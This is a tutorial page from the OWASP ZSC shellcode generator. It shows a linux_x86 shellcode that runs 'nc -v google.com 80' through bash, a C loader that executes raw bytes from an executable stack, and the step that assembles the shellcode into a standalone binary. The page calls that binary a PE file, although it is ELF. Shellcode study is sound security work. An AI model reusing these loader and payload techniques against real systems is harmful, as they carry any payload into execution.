OWASP ZSC | OWASP ZCR Shellcoder

Welcome To OWASP ZeroDay Cyber Research Shellcoder Home

Generate PE File With OWASP ZSC Shellcodes

As we know, shellcodes have many different uses, such as in exploit and malware development. But there is a question: could we compile the shellcode [assembly code] and run it without injecting it into another process or file? Of course! A shellcode is just a sequence of assembly instructions with the null bytes removed, or otherwise made injectable into a process.

OWASP ZSC lets us have the disassembled code inside the generated file. It could be used for compiling a single file. Take a look at a shellcode generated by OWASP ZSC.

#include <stdio.h>
#include <string.h>
/*
This shellcode generated by ZCR Shellcoder [zsc] http://zsc.z3r0d4y.com/
Title: system('nc[space]-v[space]google.com[space]80')
OS: linux_x86
Encode: none
Length: 74

shellcode.c:     file format elf32-i386

Disassembly of section .text:
00000000 <.text>:
   0:  6a 0b                   push   $0xb
   2:  58                      pop    %eax
   3:  99                      cltd   
   4:  52                      push   %edx
   5:  68 90 20 38 30          push   $0x30382090
   a:  59                      pop    %ecx
   b:  c1 e9 08                shr    $0x8,%ecx
   e:  51                      push   %ecx
   f:  68 2e 63 6f 6d          push   $0x6d6f632e
  14:  68 6f 67 6c 65          push   $0x656c676f
  19:  68 76 20 67 6f          push   $0x6f672076
  1e:  68 6e 63 20 2d          push   $0x2d20636e
  23:  89 e6                   mov    %esp,%esi
  25:  52                      push   %edx
  26:  68 90 90 2d 63          push   $0x632d9090
  2b:  59                      pop    %ecx
  2c:  c1 e9 10                shr    $0x10,%ecx
  2f:  51                      push   %ecx
  30:  89 e1                   mov    %esp,%ecx
  32:  52                      push   %edx
  33:  6a 68                   push   $0x68
  35:  68 2f 62 61 73          push   $0x7361622f
  3a:  68 2f 62 69 6e          push   $0x6e69622f
  3f:  89 e3                   mov    %esp,%ebx
  41:  52                      push   %edx
  42:  57                      push   %edi
  43:  56                      push   %esi
  44:  51                      push   %ecx
  45:  53                      push   %ebx
  46:  89 e1                   mov    %esp,%ecx
  48:  cd 80                   int    $0x80



compile example: gcc -ggdb -static -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o shellcode_compiled shellcode.c
*/
 
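/*
 * Loader for the generated bytes: prints their length and then transfers
 * control to them. The array is a local (stack) object, which is why the
 * compile line above needs -z execstack and -fno-stack-protector.
 */
int main(void){
    /* Byte-for-byte the opcodes listed in the disassembly above. */
    unsigned char shellcode[]= "\x6a\x0b\x58\x99\x52\x68\x90\x20\x38\x30\x59\xc1\xe9\x08\x51\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x76\x20\x67\x6f\x68\x6e\x63\x20\x2d\x89\xe6\x52\x68\x90\x90\x2d\x63\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
    /*
     * strlen() stops at the first NUL, so the printed length is only right
     * because the generator emitted no 0x00 byte ("Encode: none", "Length: 74").
     * strlen() takes char *, and its size_t result must be printed with %zu —
     * the original "%d" with a size_t argument is undefined behaviour.
     */
    fprintf(stdout,"Length: %zu\n\n",strlen((const char *)shellcode));
    /* Cast the data array to a function pointer and call it. */
    (*(void(*)(void)) shellcode)();
    return 0;
}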

Our shellcode is built for the linux_x86 OS and will execute the “nc -v google.com 80” command, and as we can see, we have the disassembled code in the comment of the C file.

Disassembly of section .text:
00000000 <.text>:
   0:    6a 0b                   push   $0xb
   2:    58                      pop    %eax
   3:    99                      cltd
   4:    52                      push   %edx
   5:    68 90 20 38 30          push   $0x30382090
   a:    59                      pop    %ecx
   b:    c1 e9 08                shr    $0x8,%ecx
   e:    51                      push   %ecx
   f:    68 2e 63 6f 6d          push   $0x6d6f632e
  14:    68 6f 67 6c 65          push   $0x656c676f
  19:    68 76 20 67 6f          push   $0x6f672076
  1e:    68 6e 63 20 2d          push   $0x2d20636e
  23:    89 e6                   mov    %esp,%esi
  25:    52                      push   %edx
  26:    68 90 90 2d 63          push   $0x632d9090
  2b:    59                      pop    %ecx
  2c:    c1 e9 10                shr    $0x10,%ecx
  2f:    51                      push   %ecx
  30:    89 e1                   mov    %esp,%ecx
  32:    52                      push   %edx
  33:    6a 68                   push   $0x68
  35:    68 2f 62 61 73          push   $0x7361622f
  3a:    68 2f 62 69 6e          push   $0x6e69622f
  3f:    89 e3                   mov    %esp,%ebx
  41:    52                      push   %edx
  42:    57                      push   %edi
  43:    56                      push   %esi
  44:    51                      push   %ecx
  45:    53                      push   %ebx
  46:    89 e1                   mov    %esp,%ecx
  48:    cd 80                   int    $0x80

And now all we need is to split the assembly instructions out of the disassembly listing.

# Instructions extracted from the disassembly above (linux_x86, AT&T syntax).
# Annotations decode the pushed immediates as little-endian ASCII; string
# fragments are pushed last-to-first so they read forward in memory.
push   $0xb
pop    %eax                # eax = 0xb (syscall number; execve on linux_x86)
cltd                       # edx = sign of eax = 0, used below as a NUL dword
push   %edx                # NUL terminator for the first string
push   $0x30382090
pop    %ecx
shr    $0x8,%ecx           # drops the 0x90 filler byte: ecx = 0x00303820 = " 80\0"
push   %ecx
push   $0x6d6f632e         # ".com"
push   $0x656c676f         # "ogle"
push   $0x6f672076         # "v go"
push   $0x2d20636e         # "nc -"
mov    %esp,%esi           # esi -> "nc -v google.com 80"
push   %edx                # NUL terminator for the second string
push   $0x632d9090
pop    %ecx
shr    $0x10,%ecx          # drops two 0x90 filler bytes: ecx = 0x0000632d = "-c\0\0"
push   %ecx
mov    %esp,%ecx           # ecx -> "-c"
push   %edx                # NUL terminator for the third string
push   $0x68               # "h\0\0\0"
push   $0x7361622f         # "/bas"
push   $0x6e69622f         # "/bin"
mov    %esp,%ebx           # ebx -> "/bin/bash"
push   %edx                # argv terminator (NULL)
push   %edi                # edi is never set here; presumably relied on to be 0 at process entry
push   %esi                # argv[2] -> "nc -v google.com 80"
push   %ecx                # argv[1] -> "-c"
push   %ebx                # argv[0] -> "/bin/bash"
mov    %esp,%ecx           # ecx -> argv array; ebx = path, edx = 0 (envp)
int    $0x80               # Linux x86 system-call gate


We have to save these instructions in a file and compile it. Then we have the PE file.

root@airz:/# cat shellcode.asm
push   $0xb
pop    %eax
cltd
push   %edx
push   $0x30382090
pop    %ecx
shr    $0x8,%ecx
push   %ecx
push   $0x6d6f632e
push   $0x656c676f
push   $0x6f672076
push   $0x2d20636e
mov    %esp,%esi
push   %edx
push   $0x632d9090
pop    %ecx
shr    $0x10,%ecx
push   %ecx
mov    %esp,%ecx
push   %edx
push   $0x68
push   $0x7361622f
push   $0x6e69622f
mov    %esp,%ebx
push   %edx
push   %edi
push   %esi
push   %ecx
push   %ebx
mov    %esp,%ecx
int    $0x80

root@airz:/# as shellcode.asm -o shellcode.o
root@airz:/# ld shellcode.o -o shellcode
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048054
root@airz:/# ./shellcode 
DNS fwd/rev mismatch: google.com != lga15s46-in-f7.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f5.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f8.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f0.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f9.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f1.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f4.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f2.1e100.net
google.com [173.194.123.7] 80 (http) open


References

ZeroDay Cyber Research
ZSC Home
OWASP Page
Ali Razmjoo